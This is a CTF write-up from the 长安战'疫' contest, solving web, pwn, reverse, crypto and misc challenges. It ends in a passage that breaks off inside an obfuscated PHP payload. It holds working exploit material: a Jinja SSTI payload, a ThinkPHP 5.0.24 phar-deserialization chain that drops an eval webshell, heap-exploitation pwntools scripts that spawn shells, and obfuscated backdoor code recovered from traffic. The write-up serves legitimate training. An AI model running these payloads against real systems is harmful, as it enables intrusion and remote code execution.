Back
Featured image of post 长安战“疫” Writeup

长安战“疫” Writeup

感谢空白爷爷带我们上大分~

Web

RCE_No_Para

无参数RCE,且过滤了部分函数。

最终payload:

?a=cat flag.php;&code=system(current(current(get_defined_vars())));

flask

查看网页源码

<!--if not request.full_path.endswith(".js?"):
	    if not request.full_path.startswith("/login"):
	        return redirect("login")-->

要求路径是以/login开头,以.js?结尾,

查看 flask 文档

Requested path, including the query string.

所以构造路径:

/login/../admin?a=.js?

然后源码提示:

<!--admin/?name=-->

使用以下路径发现是ssti

/login/../admin?name={{7*7}}&a=.js?

fuzz发现过滤了__builtins,所以绕,最终payload

/login/../admin?name={{config|attr('_'+'_init_'+'_')|attr('_'+'_globals_'+'_')|attr('_'+'_getitem_'+'_')('_'+'_buil'+'tins_'+'_')|attr('_'+'_getitem_'+'_')('eval')('_'+'_import_'+'_("os").popen("cat /flag").read()')}}&a=.js?

tp

变量覆盖+phar反序列化+thinkphp 5.0.24反序列化写webshell

生成phar文件

<?php
namespace think\process\pipes;
class Windows
{
    private $files = [];
    public function __construct()
    {
        $this->files = [new \think\model\Merge];
    }
}
 
namespace think\model;
use think\Model;
 
class Merge extends Model
{
    protected $append = [];
    protected $error;
 
    public function __construct()
    {
        $this->append = [
            'bb' => 'getError'
        ];
        $this->error = (new \think\model\relation\BelongsTo);
    }
}
namespace think;
class Model{}
 
namespace think\console;
class Output
{
    protected $styles = [];
    private $handle = null;
    public function __construct()
    {
        $this->styles = ['removeWhereField'];
        $this->handle = (new \think\session\driver\Memcache);
    }
}
 
namespace think\model\relation;
class BelongsTo
{
    protected $query;
    public function __construct()
    {
        $this->query = (new \think\console\Output);
    }
}
 
namespace think\session\driver;
class Memcache
{
    protected $handler = null;
    public function __construct()
    {
        $this->handler = (new \think\cache\driver\Memcached);
    }
}
namespace think\cache\driver;
class File
{
    protected $tag;
    protected $options = [];
    public function __construct()
    {
        $this->tag = false;
        $this->options = [
            'expire'        => 3600,
            'cache_subdir'  => false,
            'prefix'        => '',
            'data_compress' => false,
            'path'          => 'php://filter/convert.base64-decode/resource=/var/www/html/public/',
        ];
    }
}
 
class Memcached
{
    protected $tag;
    protected $options = [];
    protected $handler = null;
 
    public function __construct()
    {
        $this->tag = true;
        $this->options = [
            'expire'   => 0,
            'prefix'   => 'PD9waHAKZXZhbCgkX0dFVFsnYSddKTsKPz4',
        ];
        $this->handler = (new File);
    }
}
$obj = new \think\process\pipes\Windows();
@unlink("or4nge.phar");
$phar = new \Phar("or4nge.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($obj); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

变量覆盖,触发反序列化

import requests
url = 'http://9316a714.lxctf.net/public/index.php/index/Index/upload'

files = {'file': ('or4nge', open('or4nge.phar', 'rb'))}
r = requests.post(url, files=files)
r = requests.post(url, params="FILES[file][tmp_name]=or4nge.jpg&FILES[file][name]=phar://or4nge")
print(r.text)

会在 /var/www/html/public 下生成 8fba8bb6410a4aee90b063a8b7e78b73.php,文件内容包含 <?php eval($_GET['a']); 直接用就可以了。

Pwn

pwn1

from pwn import *
import sys
context.log_level = "debug"

if len(sys.argv) < 2:
    debug = True
else:
    debug = False

if debug:
    p = process("./pwn1")

else:
    p = remote("113.201.14.253",16088)

ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a, b)

def debugf(b=0):
    if debug:
        if b:
            gdb.attach(p,"b *{b}".format(b = hex(b)))
        else:
            gdb.attach(p)

debugf(0x08048596)

ru('Gift:')
buf = int(ru(b'\n')[:-1],16)
pay = p32(0x8048540)+b'a'*48 + p32(buf+4)
sn(pay)
#flag{474b7f9219effe69530da4ad63c1752a}
p.interactive()

pwn2

off by one

from pwn import *
import sys
context(os='linux', arch='amd64', log_level='debug')

if len(sys.argv) < 2:
    debug = True
else:
    debug = False

if debug:
    p = process("./pwn2")
    libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
else:
	p = remote("113.201.14.253", 16066)
	libc = ELF("./libc-2.27.so")
    
def debugf(b=0):
    if debug:
        if b:
            gdb.attach(p,"b *$rebase({b})".format(b = hex(b)))
        else:
            gdb.attach(p)
            
elf = ELF('./pwn2')


ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a, b)



def menu(i):
	ru("Choice: ")
	sl(str(i))

def add(size, content):
	menu(1)
	sla("size: ", str(size))
	sa("content: ", content)
    
def edit(idx,content):
	menu(2)
	sla("idx: ", str(idx))
	sla("content: ", content)

def free(idx):
	menu(3)
	sla("idx: ", str(idx))

def show(idx):
	menu(4)
	sla("idx: ", str(idx))

add(0x18, b"a" + b"\n")
add(0x18, b"b"*0x18 + b"\n")

for i in range(8):
	add(0x80, b"aaa" + b"\n")

for i in range(8):
	free(9-i)

free(0)
add(0x18, b"a"*0x18 + b"\xb1" + b"\n")
free(1)
add(0xa0, b"c" + b"\n")
edit(1, b"c"*0x1f)
show(1)
libc.address = u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00")) - 96 - 0x10 - libc.sym["__malloc_hook"]
print(hex(libc.address))

edit(1, b"c"*0x18 + p64(0x91) + p64(libc.sym["__free_hook"]) + p64(96 + 0x10 + libc.sym["__malloc_hook"]))

add(0x80, b"/bin/sh\x00" + b"\n")

for i in range(7):
	add(0x80, b"aaa" + b"\n")


free(9)

edit(1, b"c"*0x18 + p64(0x91) + p64(libc.sym["__free_hook"])*2)
add(0x80, b"ddd" + b"\n")
add(0x80, p64(libc.sym["system"]) + b"\n")
free(2)
p.interactive()

pwn3

随便玩玩拿到puts地址,写exit_hook拿shell

from pwn import *
import sys
context.log_level = "debug"

if len(sys.argv) < 2:
    debug = True
else:
    debug = False

if debug:
    p = process("./Gpwn3")
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

else:
    p = remote("113.201.14.253", 16033)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a, b)

def debugf(b=0):
    if debug:
        if b:
            gdb.attach(p,"b *{b}".format(b = hex(b)))
        else:
            gdb.attach(p)

def menu(i):
    sla('choice:', str(i))
def create(c):
    menu(1)
    sa(':', c)
def up(c):
    menu(2)
    sa(':', c)

create(b'\xff'*35)
# up(b'\x01'*34+b'\x00')
up(b'\x01')
up(p64(2147483647))
menu(3)
ru('reward:')
libc.address = int(ru(b'\n')[:-1],16) - 0x06f6a0
log.warning(hex(libc.address))
ru('name')
sn(p64(libc.address+0x5f0040+3848))
ru('you!')
sn(p64(libc.address+0xf1247))
p.interactive()
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

'''

Reverse

lemon

感谢 yaoxi 师傅送的一血(狗头)

lemon 语言,仿照 HITCON cclemon,手动恢复字节码

var a = [65, 69, 83];
var b = [113, 105, 117, 113, 105, 117, 108, 101, 98, 105, 101, 122, 117, 111, 108, 101];
var c = 0;
var d = [];
while (c < 256){
  d.append(c);
  c = c + 1;
};
var e = 0;
while (e < 256) {
  d[e] = (d[e] + a[e % 3] + b[e % 16]) % 256;
  e += 1;
};
var f = 0;
while (f < 3) {
  var g = 0;
  while (g < 256) {
    d[g] = d[g] ^ d[(g + 1) % 256];
    g = g + 1;
  };
  var h = 0;
  while (h < 256) {
    d[h] = (d[h] + 1) % 256;
    h = h + 1;
  };
  f = f + 1;
};
f = 0;
var i = 0;
while (f < 256) {
  i = i + d[f];
  f = f + 1;
};
i = i * 20 + 5;
i = i * 30 - 5;
i = i * 40 - 5;
i = i * 50 + 6645;
print(i);

运行结果就是flag

easy_py

uncompyle6反编译

sleep+多线程,两个运算轮流进行

In [1]: cipher = [44, 100, 3, 50, 106, 90, 5, 102, 10, 112]

In [2]: for i in range(0, 9, 2):
   ...:     cipher[i] ^= cipher[i + 1]
   ...:     cipher[i + 1] ^= i + 1
   ...:

In [3]: cipher
Out[3]: [72, 101, 49, 49, 48, 95, 99, 97, 122, 121]

In [4]: for c in cipher:
   ...:     print (chr(c), end='')
   ...:
He110_cazy

combat_slogan

jd-gui可出源码

package com.xaut;

import java.io.PrintStream;
import java.util.Scanner;

public class Main
{
  public static String stringTransformAscii(String value)
  {
    StringBuffer sbu = new StringBuffer();
    char[] chars = value.toCharArray();
    for (int i = 0; i < chars.length; i++) {
      if (i != chars.length - 1) {
        sbu.append(chars[i]).append(",");
      } else {
        sbu.append(chars[i]);
      }
    }
    return sbu.toString();
  }
  
  public static String ttk(String input)
  {
    StringBuilder sb = new StringBuilder();
    for (int i = 0; i < input.length(); i++)
    {
      char c = input.charAt(i);
      if ((c >= 'a') && (c <= 'm')) {
        c = (char)(c + '\r');
      } else if ((c >= 'A') && (c <= 'M')) {
        c = (char)(c + '\r');
      } else if ((c >= 'n') && (c <= 'z')) {
        c = (char)(c - '\r');
      } else if ((c >= 'N') && (c <= 'Z')) {
        c = (char)(c - '\r');
      }
      sb.append(c);
    }
    return sb.toString();
  }
  
  public static void main(String[] args)
  {
    System.out.println("Please input your keyword::");
    Scanner scan = new Scanner(System.in);
    String str2 = "ddd";
    if (scan.hasNextLine()) {
      str2 = scan.nextLine();
    }
    scan.close();
    
    String stringTransformAscii = stringTransformAscii(str2);
    
    String[] offerCodeString = stringTransformAscii.split(",");
    StringBuffer str5 = new StringBuffer();
    for (String s : offerCodeString) {
      str5.append(s);
    }
    int flag = ttk(str2).compareTo("Jr_j11y_s1tug_g0_raq_g0_raq_pnml");
    if ((flag == 0) && (str5.toString().compareTo("871019511949491089510249103104116951164895101110100951164895101110100959997122121") == 0)) {
      System.out.println("Your keyword is correct!");
    } else {
      System.out.println("Your keyword is wrong!");
    }
  }
}

ttk 凯撒 k=13

We_w11l_f1ght_t0_end_t0_end_cazy

flag:

flag{We_w11l_f1ght_t0_end_t0_end_cazy}

cute_doge

运行后dump内存

解base64

ZmxhZ3tDaDFuYV95eWRzX2Nhenl9

flag:

flag{Ch1na_yyds_cazy}

Crypto

LinearEquations

线性同余方程

d[0] * b + d[1] * a + c = d[2]
d[1] * b + d[2] * a + c = d[3]
d[2] * b + d[3] * a + c = d[4]

所以有

(d[1] - d[0]) * b + (d[2] - d[1]) * a = d[3] - d[2]
(d[2] - d[1]) * b + (d[3] - d[2]) * a = d[4] - d[3]

求解同余方程即可

直接放ipython的log了

d = [2626199569775466793, 8922951687182166500, 454458498974504742, 7289424376539417914, 8673638837300855396]
n = 10104483468358610819

In [24]: from libnum import *

In [25]: left = (d[4] - d[3]) * (d[1] - d[0]) % n - (d[3] - d[2]) * (d[2] - d[1]) % n

In [26]: left
Out[26]: 2071989288624214374

In [28]: right = (d[3] - d[2]) * (d[1] - d[0]) % n - (d[2] - d[1]) ** 2 % n

In [29]: right
Out[29]: -220570350959470413

In [30]: right %= n

In [31]: right
Out[31]: 9883913117399140406

In [32]: invmod(right, n)
Out[32]: 9158039860152232368

In [33]: invmod(right, n) * left % n
Out[33]: 5490290802446982981

In [34]: a = invmod(right, n) * left % n

In [35]: n2s(a)
Out[35]: b'L1near_E'

In [36]: left = (d[3] - d[2]) % n

In [37]: left = (d[3] - d[2]) % n - (d[2] - d[1]) * a % n

In [38]: left
Out[38]: 2594113358272023300

In [39]: left %= n

In [40]: left
Out[40]: 2594113358272023300

In [41]: right = d[1] - d[0]

In [42]: left * invmod(right, n)
Out[42]: 22730265397535795623381317872033942100

In [43]: b = left * invmod(right, n) % n

In [44]: b
Out[44]: 8175498372211240502

In [45]: n2s(b)
Out[45]: b'qu4t1on6'

In [46]: n2s(a)
Out[46]: b'L1near_E'

In [47]: n2s(b)
Out[47]: b'qu4t1on6'

In [48]: c = d[2] - d[0] * b - d[1] * a

In [49]: c %= n

In [50]: n2s(c)
Out[50]: b'_1s_34sy'

no_can_no_bb

key 最大是 1 << 20,可以直接爆破

如果解密后开头为 cazy 说明正确

from Crypto.Util.number import long_to_bytes
from Crypto.Cipher import AES

def pad(m):
    tmp = 16-(len(m)%16)
    return m + bytes([tmp for _ in range(tmp)])

def encrypt(m,key):
    aes = AES.new(key,AES.MODE_ECB)
    return aes.encrypt(m)

c = b'\x9d\x18K\x84n\xb8b|\x18\xad4\xc6\xfc\xec\xfe\x14\x0b_T\xe3\x1b\x03Q\x96e\x9e\xb8MQ\xd5\xc3\x1c'

for i in range(1, (1 << 20) + 1):
    key = pad(long_to_bytes(i))
    aes = AES.new(key, AES.MODE_ECB)
    flag = aes.decrypt(c)
    if flag[:5] == b'cazy{':
        print (flag)

# b'cazy{n0_c4n,bb?n0p3!}\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b'

no_cry_no_can

福纳姆密码,密钥长度为 5,并且已知 flag 开头为 cazy{,所以直接解

from libnum import *

front = b'cazy{'
cipher = b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'
key = bytes([f ^ c for f, c in zip(front, cipher)])
key *= 8

for c, k in zip(cipher, key):
    print (chr(c ^ k), end='')
print()
#cazy{y3_1s_a_h4nds0me_b0y!}

math

from math import gcd
from gmpy2 import invert, is_prime
from Crypto.Util.number import long_to_bytes as n2s

invq = 0x63367a2b947c21d5051144d2d40572e366e19e3539a3074a433a92161465543157854669134c03642a12d304d2d9036e6458fe4c850c772c19c4eb3f567902b3
e = 0x10005
d = 0xae285803302de933cfc181bd4b9ab2ae09d1991509cb165aa1650bef78a8b23548bb17175f10cddffcde1a1cf36417cc080a622a1f8c64deb6d16667851942375670c50c5a32796545784f0bbcfdf2c0629a3d4f8e1a8a683f2aa63971f8e126c2ef75e08f56d16e1ec492cf9d26e730eae4d1a3fecbbb5db81e74d5195f49f1
c = 0x5a1e001edd22964dd501eac6071091027db7665e5355426e1fa0c6360accbc013c7a36da88797de1960a6e9f1cf9ad9b8fd837b76fea7e11eac30a898c7a8b6d8c8989db07c2d80b14487a167c0064442e1fb9fd657a519cac5651457d64223baa30d8b7689d22f5f3795659ba50fb808b1863b344d8a8753b60bb4188b5e386
kphi = e * d - 1
for k in range(1, e):
    if kphi % k == 0:
        phi = kphi // k
        x = invq * (phi - 1) + 1
        g = pow(2, phi, x) - 1
        for r in [3, 5]:
            g = gcd(g, pow(r, phi, x) - 1)
        if 1 < g < 10 * c:
            p = g
            break
assert is_prime(p)
m = pow(c, d, p)
print(n2s(m))
#flag{c4617a206ba83d7f824dc44e5e67196a}

no_math_no_cry

解方程就行

sage:

((x-(1<<500))**2+0x0338470-10715086071862673209484250490600018105614048117055336074437503883703510511248211671489145400471130049712947188505612184220711949974689275316345656079538583389095869818942817127245278601695124271626668045250476877726638182396614587807925457735428719972874944279172128411500209111406507112585996098530169).roots()

得到:

[(6546781215792283740026379393655198304433284092086129578966582736192267592809173519135824526914006312711658519949412876200359056032790029580847075395203,
  1),
 (175590630715657737802001590114848305707265818075457058980756525809979783549,
  1)]

再long_to_bytes就行

flag:

cazy{1234567890_no_m4th_n0_cRy}

Misc

八卦迷宫

直接走迷宫就行

flag:

cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}

朴实无华的取证

vol 内存取证 dump 出 我的日记.txt.txtflag.zip 以及 flag.png 那个文件

我的日记.txt.txt 找到压缩包密码 20211209

得到 flag.zip 压缩包里的 encrypt.txt 内容

//幼儿园水平的加密(部分)
void Encrypt(string& str)
{
	for(int i = 0; i < str.length(); i++)
	{
		if(str[i] >='a'&& str[i]<='w')
			str[i]+=3;
		else if(str[i]=='x')
			str[i]='a';
		else if(str[i]=='y')
			str[i]='b';
		else if(str[i]=='z')
			str[i]='c';	
		else if(str[i]=='_')
			str[i]='|';
		str[i] -= 32;
	}
}

再通过 flag.png 的内容依照上面的 encrypt() 进行解密

FDCB[8LDQ?ZLOO?FHUWDLQOB?VXFFHHG?LQ?ILJKWLQJ?WKH?HSLGHPLF]
>>> ss = 'FDCB[8LDQ?ZLOO?FHUWDLQOB?VXFFHHG?LQ?ILJKWLQJ?WKH?HSLGHPLF]'
>>> flag = ''
>>> for i in range(len(ss)):
...     flag += chr(ord(ss[i])+32)
...
>>> flag
'fdcb{Xldq_zloo_fhuwdlqob_vxffhhg_lq_iljkwlqj_wkh_hslghplf}'
>>> flag.replace('a','x').replace('b','y').replace('c','z')
'fdzy{Xldq_zloo_fhuwdlqoy_vxffhhg_lq_iljkwlqj_wkh_hslghplf}'

sss = 'fdzy{Xldq_zloo_fhuwdlqoy_vxffhhg_lq_iljkwlqj_wkh_hslghplf}'
for i in range(len(sss)):
    if(ord(sss[i]) >= 100 and ord(sss[i]) <= 122):
        print("i:",i,"data:",chr(ord(sss[i])-3))
print(sss)

i: 0 data: c
i: 1 data: a
i: 2 data: w
i: 3 data: v
i: 6 data: i
i: 7 data: a
i: 8 data: n
i: 10 data: w
i: 11 data: i
i: 12 data: l
i: 13 data: l
i: 15 data: c
i: 16 data: e
i: 17 data: r
i: 18 data: t
i: 19 data: a
i: 20 data: i
i: 21 data: n
i: 22 data: l
i: 23 data: v
i: 25 data: s
i: 26 data: u
i: 27 data: c
i: 28 data: c
i: 29 data: e
i: 30 data: e
i: 31 data: d
i: 33 data: i
i: 34 data: n
i: 36 data: f
i: 37 data: i
i: 38 data: g
i: 39 data: h
i: 40 data: t
i: 41 data: i
i: 42 data: n
i: 43 data: g
i: 45 data: t
i: 46 data: h
i: 47 data: e
i: 49 data: e
i: 50 data: p
i: 51 data: i
i: 52 data: d
i: 53 data: e
i: 54 data: m
i: 55 data: i
i: 56 data: c

aaa = "fdzy{Xldq_zloo_fhuwdlqoy_vxffhhg_lq_iljkwlqj_wkh_hslghplf}"
>>> flag2 = ""
>>> for i in range(len(aaa)):
...     flag2 += chr(ord(aaa[i])-3)
>>> flag2
'cawvxUian\\will\\certainlv\\succeed\\in\\fighting\\the\\epidemicz'
#根据上面的对应然后将其进行整理可得
cazy{Xian_will_certainly_succeed_in_fighting_the_epidemic}

flag:

cazy{Xian_will_certainly_succeed_in_fighting_the_epidemic}

无字天书

蚁剑流量

流量后面发现 zip 文件的头部 hex 504B

提取出来后发现是一个 zip

解压后得到 key.wsflag.txt

key.ws是whitesapce

http://vii5ard.github.io/whitespace/

得到密码 XiAnWillBeSafe

再去用 snow 去利用这个密码解 flag.txt

flag:

cazy{C4n_y0u_underSt4nd_th3_b0oK_With0ut_Str1ng}

西安加油

流量 http 对象导出 secret.txt

解 base64 发现是一个压缩包

后面部分就是拼图

还原结果

binary

file命令 显示这是个class文件

利用luyten反编译得到源码

发现是一堆数据 ascii转chr

MDAwMDAwMDEwMTExMDAwMDAwMDAxMTExMTEwMTExMDAwMDAwMFxuMDExMTExMDEwMTEwMTAxMDExMTExMDAwMTExMDExMDExMTExMFxuMDEwMDAxMDEwMDAwMTExMTAwMDExMTAxMDExMDExMDEwMDAxMFxuMDEwMDAxMDExMDAwMDAxMTAwMDExMTAwMDAwMTAxMDEwMDAxMFxuMDEwMDAxMDExMTAxMTAxMTAwMTEwMTEwMTAxMTExMDEwMDAxMFxuMDExMTExMDEwMTExMDEwMDAwMDAwMTAwMTAwMDAxMDExMTExMFxuMDAwMDAwMDEwMTAxMDEwMTAxMDEwMTAxMDEwMTAxMDAwMDAwMFxuMTExMTExMTEwMDEwMDAwMDAwMDEwMDExMDAxMTExMTExMTExMVxuMTEwMDAxMDEwMTAxMDAwMDEwMTExMTExMDEwMDAwMDAxMTAwMFxuMDEwMTEwMTAwMDExMDAxMDAxMDAwMDEwMDExMDEwMTAxMTEwMVxuMTAxMTAwMDAwMTAwMTExMTAwMTEwMDAxMTAxMDAwMDAxMDAxMFxuMTExMDExMTExMTExMDAxMDEwMTEwMTAwMDExMDEwMTAxMTEwMFxuMTAxMDExMDAwMTExMDAwMDAwMDExMDEwMDAwMDAwMDAwMDAxMFxuMDExMDEwMTAwMTAwMDEwMDAxMTAxMTEwMTAxMTEwMTExMTEwMVxuMDAxMDEwMDEwMDExMTExMTEwMTExMDAwMDExMDAxMDEwMDAxMFxuMDAxMDAwMTEwMTExMDExMDExMDAxMTAwMTEwMDExMDAxMTEwMVxuMTExMDEwMDExMDAwMTExMTExMTAxMTAxMDAxMTAwMDAwMDAxMFxuMDAwMDExMTAxMDEwMDAxMTEwMDAwMDEwMTEwMTExMTExMDExMVxuMTEwMTEwMDExMDEwMTEwMTAwMTEwMDAxMDEwMDExMDAwMDEwMFxuMDEwMTAwMTAwMTExMTAwMTAwMDAwMTAwMTExMDAxMDAxMDExMVxuMDEwMTAxMDAxMTAwMDExMTAwMDExMDAxMDAwMDAxMDEwMTAwMFxuMTAwMTEwMTExMTEwMTExMDExMDAxMDAxMTExMTEwMTAxMTEwMVxuMTEwMTEwMDAxMDExMTAwMDAwMDEwMTExMDExMDAwMTAxMTAxMFxuMDAxMTAwMTAwMDExMTEwMTEwMDAxMTExMDEwMDEwMDExMTEwMVxuMDEwMTAwMDAwMTExMDEwMTExMDExMDEwMTExMTExMDEwMDAxMFxuMDEwMTAxMTAxMTAwMTAwMTAwMDAwMDExMDEwMDAxMDAxMTExMVxuMDExMDEwMDAxMDAwMTExMDAxMDExMDAxMTAxMTExMTAwMTEwMFxuMDExMTAwMTExMTEwMDAwMDAxMDExMDExMDExMTAwMTExMTEwMFxuMDEwMDExMDAxMDExMDAxMDEwMDAxMDExMTAxMTAwMDAwMDAwMFxuMTExMTExMTEwMTAxMTAwMTExMDAxMTEwMDEwMTAxMTEwMTAxMVxuMDAwMDAwMDExMTAwMDExMTAxMTAxMDExMDAwMTAxMDEwMDEwMFxuMDExMTExMDExMTAwMTEwMTAxMDExMDEwMTEwMDAxMTEwMTExMVxuMDEwMDAxMDEwMDExMDAwMDExMDAxMTAxMDAwMDAwMDAwMDAxMFxuMDEwMDAxMDEwMTExMTEwMTEwMDAxMTExMTExMTExMDEwMDExMVxuMDEwMDAxMDEwMTEwMTExMTExMTEwMDAwMDAxMDEwMTAxMDExMFxuMDExMTExMDExMTExMTAwMDEwMTEwMTAwMTExMTAwMDExMDExMFxuMDAwMDAwMDExMTExMTAxMTExMDExMDAwMDAwMDEwMDAxMTAwMA==

base64之后得到1369个01的组合 可被开方为37推测其应该是一个二维码

画图:

from PIL import Image 
MAX = 37
pic = Image.new("RGB",(MAX,MAX))
str = "0000000101110000000011111101110000000011111010110101011111000111011011111001000101000011110001110101101101000100100010110000011000111000001010100010010001011101101100110110101111010001001111101011101000000010010000101111100000000101010101010101010101010000000111111110010000000010011001111111111111000101010100001011111101000000110000101101000110010010000100110101011101101100000100111100110001101000001001011101111111100101011010001101010111001010110001110000000110100000000000010011010100100010001101110101110111110100101001001111111011100001100101000100010001101110110110011001100110011101111010011000111111101101001100000001000001110101000111000001011011111101111101100110101101001100010100110000100010100100111100100000100111001001011101010100110001110001100100000101010001001101111101110110010011111101011101110110001011100000010111011000101101000110010001111011000111101001001111010101000001110101110110101111110100010010101101100100100000011010001001111101101000100011100101100110111110011000111001111100000010110110111001111100010011001011001010001011101100000000011111111010110011100111001010111010110000000111000111011010110001010100100011111011100110101011010110001110111101000101001100001100110100000000000100100010101111101100011111111110100111010001010110111111110000001010101011001111101111110001011010011110001101100000000111111011110110000000100011000"

i = 0
for y in range(0,MAX):
    for x in range(0,MAX):
        if(str[i] == '0'):
            pic.putpixel([x,y],(0,0,0))
        else:
            pic.putpixel([x,y],(255,255,255))
        i = i + 1
pic.show()
pic.save('flag.png')

得到的二维码扫码得到flag

flag:

flag{932b2c0070e4897ea7df0190dbf36ece}

Ez_Steg

压缩包注释告诉说是6个数字 爆破压缩包密码得到220101

然后得到两个文件

stegosaurus工具求解pyc隐写

得到 TheKey:St3g1sV3ryFuNny

emjoy猜测是 emjoy-aes

https://aghorler.github.io/emoji-aes/

解码得到flag

flag:

cazy{Em0j1s_AES_4nd_PyC_St3g_D0_yoU_l1ke}

ez_Encrypt

蚁剑流量

解一下一开始的base64发现是pop链

但是都不重要 直接锁定最后的web123

base64解开以后是一个压缩包

解压后在app\controller\index.php找到了混淆后的php代码

<?php define('IKlSux1227',__FILE__);$DusPFr=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZHF0d3lpT2VBY1VaTHBDdUhuYm1ndkZzZlNhUFlsTUpCTmpSVmtLeFFEVFdJcnpFb1hHaA==");$arCiCL=$DusPFr[3].$DusPFr[6].$DusPFr[33].$DusPFr[30];$VvUrBZ=$DusPFr[33].$DusPFr[10].$DusPFr[24].$DusPFr[10].$DusPFr[24];$DEomKk=$VvUrBZ[0].$DusPFr[18].$DusPFr[3].$VvUrBZ[0].$VvUrBZ[1].$DusPFr[24];$LnpnvY=$DusPFr[7].$DusPFr[13];$arCiCL.=$DusPFr[22].$DusPFr[36].$DusPFr[29].$DusPFr[26].$DusPFr[30].$DusPFr[32].$DusPFr[35].$DusPFr[26].$DusPFr[30];eval($arCiCL("JFZDQlpRVz0iZ29NVFFoZXFpYVVPdWJtWWZSSlNya1dObmRFc1BaR2pBS3BDVnRCSUh3REZ4Y3pYTGx2eVlUY2lVdVBuZ3BzeXFib09saGpGSVpOU3d6bU1IR3ZEeHRrWFZhV2ZkQUpFclJLTENCUWVISjlBcGR4WUd2Vm9wTjVCdFh6WmhCdXVwWmZyY0RmM2plcmpGMnJpekxZcmNEZjN0aU1aR21qbmkwOWpITmp1UjJzMlNFOVpHTlNRR3ZzVGZvam5oREdHcGlCME5WaE5PMmhxc0x6dVZtWjBpRXVYU3ZoT2hEVkNwQmtLTzIxMHAxazZidkdwVjJ1bk9LU1p6WjVKenYxU1BvaHJPMXo0ekV6cWlEVkdjMUdVVnYxQXMxU3ZVWjVzRkVrVFZaVk1iVkVMR0VqRGJCZktWMHVBek5tQXpkekZoVmtrc05ycGIxek9wRWhwVktCdlZEV1podkVMc0JHaUdLMDlmZ1o3am1rM2JadTFWSzBaR21qbmkwOWpOS1N6Q2doWlVva0hpMEJiU0IwcWp2aFhwWjlIRlZNS2MxMHFqdmhYcFo5SEZWTUtjRTA3amRHaGl2emRGSzBaR21qbmkwOWpOS2NLTEY0Wkdtam5pMDlqTkttQUxGNFpHbWpuaTA5ak5LZjBMRjRaR21qbmkwOWpOS21BTEY0Wkdtam5pMDlqTktmMExpTVpOTkdNendHc0hGaDJzc3J3aDBhYmNFMHFqdmhYcFo5SEZWTXJ5RTBxanZoWHBaOUhGVk1LTEY0WnpCRWNHMHpDTktXekNnaDJzc3J3aDBhYmNWMHFqdmhYcFo5SEZWTWVTRTA3anYxRVVWRXZPSzBaR21qbmkwOWpOS3p6Q2doWlVva0hpMEJiY2lTenllaHR6MjVmelZScUhGaFpVb2tIaTBCYmNEanpDZ2haVW9rSGkwQmJjS0d6Q2doWlVva0hpMEJiY0RCekNnaFpVb2tIaTBCYmNER3pDZ2haVW9rSGkwQmJjS1d6Q2doWlVva0hpMEJiY0tqekNnaFpVb2tIaTBCYmNLVnpDZ2haVW9rSGkwQmJjREd6Q2doWlVva0hpMEJiY0tXenkyVjJPTkFUam1rM2JadTFWZVlnRlpWcGlWVHJSZGtOcERXa1ZFVjBSQlRlU0xoc2hOck1zTnJwcEJqT05vQlpoTmhFR05hVE9WR05HbWpaVjFUS1YwenZTVmphUEVWREZtNTVOWnpBaHZmZXBFalZjb3JpczJyTVNFVUtoWjlWaFZqSlZ2NU16VlRBekVXZ2hOdUZPS2pwczFaS05CekJidmhTVlpWeXBWQk5SSldwVk5yTk9EV05oMVZkYkVoZ1ZOVUtWRXVYUHZWZHNCQlpWb3JlczIxQVBORUVoWmpCcG9yTVZCVjRwdlZWaEJ1eWhKV2tpS2pOY0JCTHoyOXRQRFlJRndaMHAxU3FHZFZpRkVHT0YwU0ZjQlZWUHY1RmNkU1FGWkdNYk5qZk5Eak5VMnpJc29hNGJCenFpQnpjVTFqMHNCVnZzQmphaUxFU3BOYUtGWkdNYk5qZk5Eak5VMnpJc29hNGJCenFpQnpjVTFqMHNCVnZzQmphaUxTdGhLRXZzVkd2aDFCNXAzU3Rob3JhT1p1cGNCR0pHMmFGcDN1cVYyNXlWMHJtVUxTdGhLRXZzVkd2aDFCNXAzV0NzMk0zZmdaa3lLOCtISjlBcGR4WUd2Vm9wTjVCdFh6ZEdOU3RiczRyY0RmM2plcmpGMnJpekxZcmNEZjN0aU1aaEJrUVBtajBITmp1UjJzMlNFOVpHTlNRR3ZzVGZvam5oREdHcGlCME5WaE5PMmhxc0x6dVZtWjBpRXVYU3ZoT2hEVkNwQmtLTzIxMHAxazZidkdwVjJ1bk9LU1p6WjVKenYxU1BvaHJHc1ZaVnZtZVNMekRiRVQyT0tFRk52aGFWWmhWYm1HME9OMVROTkVPYkVFWmNOclVzS1dGekJFSWJtYU5WMEduc1ZzMXBWalZwZFNwRm1HdXNvNUZjVmhkTm81c3NpMDlmZ1o3anYxcVYydWlGSjBaaEJrUVBta